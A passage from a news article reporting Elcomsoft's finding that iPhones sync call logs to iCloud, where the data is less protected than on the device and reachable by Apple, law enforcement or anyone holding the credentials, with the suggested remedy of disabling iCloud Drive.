The issue, Elcomsoft’s Oleg Afonin explains, is not only that call records are synced to iCloud (when iCloud is enabled) regardless of whether the user wants that to happen or not, but also that iCloud data is loosely protected. Thus, if user’s calls are synced to the cloud, Apple themselves and third-parties with access to the proper credentials could extract them.
What’s more, all of the information stored in iCloud is available for law enforcement upon request, unlike data stored exclusively on the device, which Apple has said numerous times it cannot access.
In fact, Apple entered a spat with the FBI earlier this year when it refused to help decrypt the iPhone of San Bernardino shooter Syed Rizwan Farook, claiming that the Bureau was actually requesting a backdoor to be included in all iPhone devices. Eventually, the FBI received help from a third-party firm, but the quarrel went viral as large tech companies expressed their support for Apple. Some even announced plans to improve their encryption to provide users with increased privacy.

“On devices running iOS 8 and later versions, your personal data is placed under the protection of your passcode. For all devices running iOS 8 and later versions, Apple will not perform iOS data extractions in response to government search warrants because the files to be extracted are protected by an encryption key that is tied to the user’s passcode, which Apple does not possess,” Apple says.
However, the same is not true about data saved on iCloud, because the same encryption level no longer applies to it. In Afonin’s opinion, the cloud syncing functionality is actually a blessing for forensic researchers and law enforcement agencies, as they can access user information that would otherwise be out of reach, because of the privacy features in iOS.  
“The ability to extract call logs from the cloud instead of having to deal with the tough hardware protection of todays’ iPhones can be a blessing for forensic examiners,” Afonin says.

For users, however, this is a privacy nightmare. Not only is access to their data much easier, for Apple and for anyone with the right credentials, but the synced data – in this instance, call logs – is visible on all devices on which the same Apple ID is used.
If a user has two iPhones but a single Apple ID, the calls will appear on both devices. If two people share the same Apple ID, they will have visibility into each other’s calls. What’s more, if one of them clears the calls list on their device, the other user/device will be impacted as well.
The only way to avoid that, Elcomsoft says, is to disable iCloud Drive functionality on the iPhone. The move will not affect features such as iCloud Photo Library or iCloud backups, but will affect the syncing of data for third-party apps that rely on iCloud Drive for that. Increased privacy, it seems, comes at a cost.